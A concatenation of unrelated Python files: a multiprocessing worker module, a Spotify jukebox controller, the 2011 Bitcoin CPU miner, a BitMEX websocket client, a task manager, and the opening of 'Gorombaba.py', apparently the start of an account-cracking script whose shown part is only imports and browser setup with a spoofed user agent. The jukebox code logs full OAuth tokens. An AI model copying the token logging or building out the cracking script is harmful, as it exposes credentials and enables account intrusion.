def _run_init_func(self, additional_args: List) -> bool:
"""
Runs the init function when provided.
:param additional_args: Additional args to pass to the function (worker ID, shared objects, worker state)
:return: True when the worker needs to shut down, False otherwise
"""
def _init_func():
with TimeIt(self.worker_insights.worker_init_time, self.worker_id):
self.params.worker_init(*additional_args)
return self._run_safely(_init_func, no_args=True)[1]
def _run_func(self, func: Callable, args: List) -> Tuple[Any, bool]:
"""
Runs the main function when provided.
:param func: Function to call
:param args: Args to pass to the function
:return: Tuple containing results from the function and a boolean value indicating whether the worker needs to
shut down
"""
def _func():
with TimeIt(self.worker_insights.worker_working_time, self.worker_id,
self.max_task_duration_list, lambda: self._format_args(args, separator=' | ')):
results = func(args)
self.worker_insights.update_n_completed_tasks(self.worker_id)
return results
return self._run_safely(_func, args)
def _run_exit_func(self, additional_args: List) -> bool:
"""
Runs the exit function when provided and stores its results.
:param additional_args: Additional args to pass to the function (worker ID, shared objects, worker state)
:return: True when the worker needs to shut down, False otherwise
"""
def _exit_func():
with TimeIt(self.worker_insights.worker_exit_time, self.worker_id):
return self.params.worker_exit(*additional_args)
results, should_return = self._run_safely(_exit_func, no_args=True)
if should_return:
return True
else:
self.worker_comms.add_exit_results(self.worker_id, results)
return False
def _run_safely(self, func: Callable, exception_args: Optional[Any] = None,
no_args: bool = False) -> Tuple[Any, bool]:
"""
A rather complex locking and exception mechanism is used here so we can make sure we only raise an exception
when we should. See `_exit_gracefully` for more information.
:param func: Function to run
:param exception_args: Arguments to pass to `_format_args` when an exception occurred
:param no_args: Whether there were any args at all
:return: True when the worker needs to shut down, False otherwise
"""
if self.worker_comms.exception_thrown():
return None, True
try:
try:
# Obtain lock and try to run the function. During this block a StopWorker exception from the parent
# process can come through to signal we should stop
with self.is_running_lock:
self.is_running = True
results = func()
with self.is_running_lock:
self.is_running = False
except StopWorker:
# The main process tells us to stop working, shutting down
raise
except Exception as err:
# An exception occurred inside the provided function. Let the signal handler know it shouldn't raise any
# StopWorker exceptions from the parent process anymore, we got this.
with self.is_running_lock:
self.is_running = False
# Pass exception to parent process and stop
self._raise(exception_args, no_args, err)
raise StopWorker
except StopWorker:
# Stop working
return None, True
# Carry on
return results, False
def _raise(self, args: Any, no_args: bool, err: Exception) -> None:
"""
Create exception and pass it to the parent process. Let other processes know an exception is set
:param args: Funtion arguments where exception was raised
:param no_args: Whether there were any args at all
:param err: Exception that should be passed on to parent process
"""
# Only one process can throw at a time
with self.worker_comms.exception_lock:
# Only raise an exception when this process is the first one to raise. We do this because when the first
# exception is caught by the main process the workers are joined which can cause a deadlock on draining the
# exception queue. By only allowing one process to throw we know for sure that the exception queue will be
# empty when the first one arrives.
if not self.worker_comms.exception_thrown():
# Let others know we need to stop
self.worker_comms.set_exception_thrown()
# Create traceback string
traceback_str = "\n\nException occurred in Worker-%d with the following arguments:\n%s\n%s" % (
self.worker_id, self._format_args(args, no_args), traceback.format_exc()
)
# Sometimes an exception cannot be pickled (i.e., we get the _pickle.PickleError: Can't pickle
# <class ...>: it's not the same object as ...). We check that here by trying the pickle.dumps manually.
# The call to `queue.put` creates a thread in which it pickles and when that raises an exception we
# cannot catch it.
try:
pickle.dumps(type(err))
except pickle.PicklingError:
err = CannotPickleExceptionError()
# Add exception. When we have a progress bar, we add an additional one
self.worker_comms.add_exception(type(err), traceback_str)
if self.worker_comms.has_progress_bar():
self.worker_comms.add_exception(type(err), traceback_str)
def _format_args(self, args: Any, no_args: bool = False, separator: str = '\n') -> str:
"""
Format the function arguments to a string form.
:param args: Funtion arguments
:param no_args: Whether there were any args at all. If not, then return special string
:param separator: String to use as separator between arguments
:return: String containing the task arguments
"""
# Determine function arguments
func_args = args[1] if args and self.worker_comms.keep_order() else args
if no_args:
return "N/A"
elif isinstance(func_args, dict):
return separator.join("Arg %s: %s" % (str(key), repr(value)) for key, value in func_args.items())
elif isinstance(func_args, collections.abc.Iterable) and not isinstance(func_args, (str, bytes)):
return separator.join("Arg %d: %s" % (arg_nr, repr(arg)) for arg_nr, arg in enumerate(func_args))
else:
return "Arg 0: %s" % func_args
def _helper_func_with_idx(self, func: Callable, args: Tuple[int, Any]) -> Tuple[int, Any]:
"""
Helper function which calls the function `func` but preserves the order index
:param func: Function to call each time new task arguments become available
:param args: Tuple of ``(idx, _args)`` where ``_args`` correspond to the arguments to pass on to the function.
``idx`` is used to preserve order
:return: (idx, result of calling the function with the given arguments) tuple
"""
return args[0], self._call_func(func, args[1])
def _helper_func(self, func: Callable, args: Any) -> Any:
"""
Helper function which calls the function `func`
:param func: Function to call each time new task arguments become available
:param args: Arguments to pass on to the function
:return: Result of calling the function with the given arguments) tuple
"""
return self._call_func(func, args)
@staticmethod
def _call_func(func: Callable, args: Any) -> Any:
"""
Helper function which calls the function `func` and passes the arguments in the correct way
:param func: Function to call each time new task arguments become available
:param args: Arguments to pass on to the function
:return: Result of calling the function with the given arguments) tuple
"""
if isinstance(args, dict):
return func(**args)
elif (isinstance(args, collections.abc.Iterable) and not isinstance(args, (str, bytes)) and not
(NUMPY_INSTALLED and isinstance(args, np.ndarray))):
return func(*args)
else:
return func(args)
def _update_progress_bar(self, force_update: bool = False) -> None:
"""
Update the progress bar data
:param force_update: Whether to force an update
"""
if self.worker_comms.has_progress_bar():
(self.progress_bar_last_updated,
self.progress_bar_n_tasks_completed) = self.worker_comms.task_completed_progress_bar(
self.progress_bar_last_updated, self.progress_bar_n_tasks_completed, force_update
)
def _update_task_insights(self, force_update: bool = False) -> None:
"""
Update the task insights data
:param force_update: Whether to force an update
"""
self.max_task_duration_last_updated = self.worker_insights.update_task_insights(
self.worker_id, self.max_task_duration_last_updated, self.max_task_duration_list, force_update=force_update
)
if FORK_AVAILABLE:
class ForkWorker(AbstractWorker, MP_CONTEXTS['mp']['fork'].Process):
pass
class ForkServerWorker(AbstractWorker, MP_CONTEXTS['mp']['forkserver'].Process):
pass
class SpawnWorker(AbstractWorker, MP_CONTEXTS['mp']['spawn'].Process):
pass
class ThreadingWorker(AbstractWorker, MP_CONTEXTS['threading'].Thread):
pass
if DILL_INSTALLED:
if FORK_AVAILABLE:
class DillForkWorker(AbstractWorker, MP_CONTEXTS['mp']['fork'].Process):
pass
class DillForkServerWorker(AbstractWorker, MP_CONTEXTS['mp_dill']['forkserver'].Process):
pass
class DillSpawnWorker(AbstractWorker, MP_CONTEXTS['mp_dill']['spawn'].Process):
pass
def worker_factory(start_method: str, use_dill: bool) -> Type[Union[AbstractWorker, mp.Process, Thread]]:
"""
Returns the appropriate worker class given the start method
:param start_method: What Process/Threading start method to use, see the WorkerPool constructor
:param use_dill: Whether to use dill has serialization backend. Some exotic types (e.g., lambdas, nested functions)
don't work well when using ``spawn`` as start method. In such cased, use ``dill`` (can be a bit slower
sometimes)
:return: Worker class
"""
if start_method == 'threading':
return ThreadingWorker
elif use_dill:
if not DILL_INSTALLED:
raise ImportError("Can't use dill as the dependencies are not installed. Use `pip install mpire[dill]` to "
"install the required dependencies.")
elif start_method == 'fork':
if not FORK_AVAILABLE:
raise ValueError("Start method 'fork' is not available")
return DillForkWorker
elif start_method == 'forkserver':
if not FORK_AVAILABLE:
raise ValueError("Start method 'forkserver' is not available")
return DillForkServerWorker
elif start_method == 'spawn':
return DillSpawnWorker
else:
raise ValueError(f"Unknown start method with dill: '{start_method}'")
else:
if start_method == 'fork':
if not FORK_AVAILABLE:
raise ValueError("Start method 'fork' is not available")
return ForkWorker
elif start_method == 'forkserver':
if not FORK_AVAILABLE:
raise ValueError("Start method 'forkserver' is not available")
return ForkServerWorker
elif start_method == 'spawn':
return SpawnWorker
else:
raise ValueError("Unknown start method: '{}'".format(start_method))
|
jukebox.py
|
"""
jukebox.py
"""
import logging
import os
import threading
import time
from pprint import pprint
from typing import Tuple, List, Union, Optional, Generator, Dict
import spotipy
import spotipy.util as util
from dotenv import load_dotenv
from spotipy.oauth2 import SpotifyOAuth
import os
import json
import socket
# Initialize
load_dotenv()
CLIENT_ID = os.environ.get("CLIENT_ID")
CLIENT_SECRET = os.environ.get("CLIENT_SECRET")
SPOTIFY_USERNAME = os.environ.get("SPOTIFY_USERNAME")
REDIRECT_URI = "http://127.0.0.1:7070"
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(process)d-%(levelname)s %(message)s",
datefmt="%m/%d/%Y %I:%M:%S %p",
)
# limit useless spotify logging details
spot_logger = logging.getLogger("spotipy")
spot_logger.setLevel(logging.WARNING)
def spotipy_instance(
username: str,
) -> List[Union[spotipy.client.Spotify, SpotifyOAuth, Dict]]:
"""Returns a 'spotipy.Spotify' instance. Will request authenication at Redirect URL if not logged in before.
Parameter username: integer found in Spotify profile
Note, token expires after 60 minutes. Recommend refreshing more often than hourly.
"""
scope = (
"user-read-playback-state,user-modify-playback-state,playlist-read-private,"
+ "playlist-read-collaborative,user-read-currently-playing,user-read-private,"
+ "user-library-read,user-read-playback-position"
)
try:
token = util.prompt_for_user_token(
username=username,
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
)
sp_auth = SpotifyOAuth(
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
)
sp = spotipy.Spotify(
auth=token,
client_credentials_manager=sp_auth,
)
cached_token = spotipy.oauth2.SpotifyOAuth(
username=username,
scope=scope,
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
redirect_uri=REDIRECT_URI,
).get_cached_token()
logging.debug(f"Token successfully created/refreshed for {username}.")
logging.debug(f"full auth token: {cached_token}")
except Exception as e:
logging.exception(msg=f"Can't get token for {username}.\n{e}")
return [sp, sp_auth, cached_token]
def refresh_token(
sp_auth: SpotifyOAuth, sp: spotipy.client.Spotify, whole_token: Dict
) -> Dict:
"""Refreshes the spotify OAuth token.
Parameter sp_auth: SpotifyOAuth object with username and all details included (e.g. scope)
Parameter sp: spotipy.Spotify, state will be modified and returned.
Parameter whole_token: Doct, token return by spotify api. Updated and saved at end.
"""
logging.info("Refreshing spotify token...\n")
logging.debug(f"Cached access token info: {whole_token}")
token_info = sp_auth.refresh_access_token(whole_token["refresh_token"])
token = token_info["access_token"]
sp = spotipy.Spotify(auth=token)
return token_info, sp
def get_jukebox_id(sp: spotipy.client.Spotify) -> str:
"""Pass a spotify client and return the device number for the jukebox.
Parameter sp: spotify client
"""
result = sp.devices()
rest = result.get("devices")
box_id = ""
for device in rest:
if device["name"] == "Kid_Jukebox":
box_id = device["id"]
break
if box_id == "":
logging.error(f"Jukebox Id not found. Aborting...")
os._exit(1)
logging.debug(f"Jukebox Id={box_id}")
return box_id
def prime(fn):
def wrapper(*args, **kwargs):
v = fn(*args, **kwargs)
v.send(None)
return v
return wrapper
class FSM_jukebox:
def __init__(self):
self.stopped = self._create_stopped()
self.playing = self._create_playing()
self.paused = self._create_paused()
self.current_state = self.stopped
self.username = SPOTIFY_USERNAME
self.sp, self.sp_auth, self.token = spotipy_instance(username=self.username)
self.device_id = get_jukebox_id(self.sp)
self.records = self._load_records()
self._repeat_status = True
self.sp.repeat(state="context", device_id=self.device_id)
self._shuffle_status = True
self.sp.shuffle(state=True, device_id=self.device_id)
self._lock = threading.Lock()
self._refresh_thread = threading.Thread(target=self._refresh)
self._refresh_thread.daemon = True
self._refresh_thread.start()
def _refresh(self) -> None:
"""A function running in a separate daemon thread which will refresh spotify credentials"""
interval = 5 * 60 # testing every 5 minutes to keep connection alive
while True:
try:
logging.debug("Locking FSM for refresh")
with self._lock:
self.token, self.sp = refresh_token(
self.sp_auth, self.sp, self.token
)
# Make sure jukebox did not change id
self.device_id = get_jukebox_id(self.sp)
logging.debug("Refresh completed, unlocking FSM")
time.sleep(interval)
except socket.error:
logging.debug(
"There was a socket error. Refresh unable to be completed. Retrying in 1 minute..."
)
time.sleep(60)
def send(self, command: Tuple[str, ...]) -> None:
assert len(command) == 2
if command[1] != "" and command[0] == "play/pause":
fixed_command = (
command[0],
self.records["records"].get(command[1]).get("uri"),
)
self.current_state.send(fixed_command)
else:
self.current_state.send(command)
def _shuffle(self):
"""Randomize, i.e. shuffle. Update internal shuffle tracking variable."""
if self._shuffle_status == True:
self.sp.shuffle(state=False, device_id=self.device_id)
self._shuffle_status = False
else:
self.sp.shuffle(state=True, device_id=self.device_id)
self._shuffle_status = True
logging.info(
f"Shuffle Triggered in {self.current_state}. "
+ f"Now shuffle is set to {self._shuffle_status}."
)
def _reverse(self):
"""Skip back a track and start playing if not currently playing."""
if self._active_device() == True:
logging.debug(f"Rewinding Track, current state {self.current_state}")
if self.current_state == self.playing:
self.sp.previous_track(device_id=self.device_id)
else:
self._resume()
self.sp.previous_track(device_id=self.device_id)
self.current_state = self.playing
else:
pass
def _forward(self):
"""Skip forward a track and start playing if not currently playing."""
if self._active_device() == True:
logging.debug(
f"Skipping Forward a Track, current state {self.current_state}"
)
if self.current_state == self.playing:
self.sp.next_track(device_id=self.device_id)
else:
self._resume()
self.sp.next_track(device_id=self.device_id)
self.current_state = self.playing
else:
pass
def _resume(self) -> None:
"""Resumes playing current track."""
if self._active_device() == True:
self.sp.start_playback(device_id=self.device_id)
self.current_state = self.playing
def _stop(self) -> None:
"""Stops playing current track, moves to stopped state."""
if self._active_device() == True:
self.sp.pause_playback(device_id=self.device_id)
self.current_state = self.stopped
def _play(self, uri: str) -> None:
"""Starts playback of uri on jukebox."""
if "spotify:track:" in uri:
self.sp.start_playback(device_id=self.device_id, uris=[uri])
self.current_state = self.playing
else:
self.sp.start_playback(device_id=self.device_id, context_uri=uri)
self.current_state = self.playing
def _pause(self) -> None:
"""Pauses playback on jukebox."""
if self._active_device() == True:
self.sp.pause_playback(device_id=self.device_id)
self.current_state = self.paused
def _active_device(self):
"""Returns True if self.device_id (jukebox) matches the active device_id."""
devices_dict = self.sp.devices()
for device in devices_dict.get("devices"):
if device.get("is_active") == True and device.get("id") == self.device_id:
return True
return False
def _load_records(self) -> dict:
"""Load the records.json into python dict."""
records_json = open("./records.json", "r")
logging.info("Loaded records.json")
return json.load(records_json)
@staticmethod
def _mapping_dict() -> Dict[str, str]:
decode_dict = {
"_create_stopped": "stopped",
"_create_playing": "playing",
"_create_paused": "paused",
}
return decode_dict
@staticmethod
def _command_options() -> list:
options = ["stop", "play/pause", "forward", "reverse", "randomize"]
return options
def __repr__(self) -> str:
decode_dict = self._mapping_dict()
return str(decode_dict.get(self.current_state.__name__))
@prime
def _create_stopped(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
else:
# Pressing play/pause while stopped does nothing
pass
elif command[0].lower() == "stop":
pass
elif command[0].lower() == "forward":
# Skipping Forward while stopped does nothing
pass
elif command[0].lower() == "reverse":
# Skipping Forward while stopped does nothing
pass
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
@prime
def _create_playing(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
else:
# Pressing play/pause while playing pauses
self._pause()
elif command[0].lower() == "stop":
self._stop()
elif command[0].lower() == "forward":
# Skipping Forward skips to next track
self._forward()
elif command[0].lower() == "reverse":
# Skipping Reverse skips back to previous track
self._reverse()
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
@prime
def _create_paused(self) -> Generator:
while True:
command: str = yield
if command[0].lower() == "play/pause":
if command[1] != "":
# actually call the function to play the song
self._play(command[1])
elif self._active_device() == True:
# Pressing play while paused resumes the song if this device is being used
self._resume()
elif command[0].lower() == "stop":
self._stop()
elif command[0].lower() == "forward":
# Skipping Forward while paused starts playback and skips to next track
self._forward()
elif command[0].lower() == "reverse":
# Skipping Reverse while paused starts playback and skips back to previous track
self._reverse()
elif command[0].lower() == "randomize":
# toggles shuffling status, stays paused
self._shuffle()
else:
raise IncorrectCommand(command)
class IncorrectCommand(Exception):
def __init__(self, command):
self.command = command
logging.debug(f'"{self.command}" is invalid input')
def __str__(self):
return f'"{self.command}" is invalid input'
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9999
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
bitmex_websocket.py
|
# coding: UTF-8
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime
from src import logger, to_data_frame, notify
from src.config import config as conf
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message, digestmod=hashlib.sha256).hexdigest()
return signature
class BitMexWs:
# Account
account = ''
# Pair
pair = 'XBTUSD'
# testnet
testnet = False
# condition that the bot runs on.
is_running = True
# Notification destination listener
handlers = {}
def __init__(self, account, pair, test=False):
"""
constructor
"""
self.account = account
self.pair = pair
self.testnet = test
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:' + self.pair + ',' \
'tradeBin5m:' + self.pair + ',tradeBin1h:' + self.pair + ',tradeBin1d:' + self.pair + ',instrument:' + self.pair + ',' \
'margin,position:' + self.pair + ',wallet,orderBookL2:' + self.pair
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = conf['bitmex_test_keys'][self.account]['API_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['API_KEY']
api_secret = conf['bitmex_test_keys'][self.account]['SECRET_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['SECRET_KEY']
if len(api_key) > 0 and len(api_secret):
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " + generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
notify(f"Error occurred. {message}")
notify(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
self.__emit(table, action, to_data_frame([data[0]]))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
notify(f"Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
|
pyTaskManager.py
|
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (C) 2017 hidenorly
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread, Lock
import time
# TaskManager and Task definitions
class PyTask(object):
description = ""
taskCompleCallback = None
running = False
mStopRunning = False
_thread = None
def __init__(self, description = ""):
self.description = description
self.running = False
self._taskManager = None
self._taskCompleCallback = None
self.mStopRunning = False
self._thread = None
def execute(self, args):
self.mStopRunning = False
self.running = True
self.onExecute()
self._doneTask()
self.running = False
self.mStopRunning = False
def onExecute(self):
# override me
for i in range(50):
time.sleep(0.1)
if True == self.mStopRunning:
break
def cancel(self):
if self.running:
self.mStopRunning = True
def finalize(self):
self.running = False
def _doneTask(self):
if( (None!=self._taskCompleCallback) and (None!=self._taskManager) ):
self._taskCompleCallback(self)
class PyTaskManager:
def __init__(self, numOfThread = 4):
self.tasks = []
self.numOfThread = numOfThread
self.threads = []
self.mutexTasks = Lock()
self.mutexThreads = Lock()
self._stoppingTask = False
def addTask(self, aTask):
aTask._taskManager = self
aTask._taskCompleCallback = self._onTaskCompletion
self.mutexTasks.acquire()
try:
self.tasks.append( aTask )
finally:
self.mutexTasks.release()
def cancelTask(self, aTask):
self.mutexTasks.acquire()
self.mutexThreads.acquire()
try:
if aTask.running:
aTask.cancel()
self.tasks.remove(aTask)
_t = None
for t in self.threads:
if t == aTask._thread:
_t = t
if( None!=_t ):
self.threads.remove(_t)
finally:
self.mutexThreads.release()
self.mutexTasks.release()
def executeAll(self):
self._stoppingTask = False
self.mutexTasks.acquire()
self.mutexThreads.acquire()
try:
for aTask in self.tasks:
if( (False == aTask.running) and (len(self.threads) < self.numOfThread) ):
t = Thread(target = aTask.execute, args = (aTask,))
if(t!=None):
self.threads.append(t)
aTask.running = True
aTask._thread = t
t.start()
finally:
self.mutexThreads.release()
self.mutexTasks.release()
def isRunning(self):
result = False
self.mutexThreads.acquire()
try:
if len(self.threads) > 0:
result = True
finally:
self.mutexThreads.release()
return result
def isRemainingTasks(self):
result = False
self.mutexTasks.acquire()
try:
if len(self.tasks) > 0:
result = True
finally:
self.mutexTasks.release()
return result
def _onTaskCompletion(self, aTask):
self.cancelTask( aTask )
if self._stoppingTask == False:
self.executeAll()
def stopAll(self):
self._stoppingTask = True
while( self.isRunning() ):
self.mutexTasks.acquire()
try:
for aTask in self.tasks:
if aTask.running:
aTask.cancel()
finally:
self.mutexTasks.release()
time.sleep(0.1)
def finalize(self):
while( self.isRemainingTasks() or self.isRunning() ):
if ( self.isRunning() ):
time.sleep(0.1)
else:
break
|
Gorombaba.py
|
# coding=utf-8
#coding_by_Azhar_Baloch
#Sahu-Zada
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
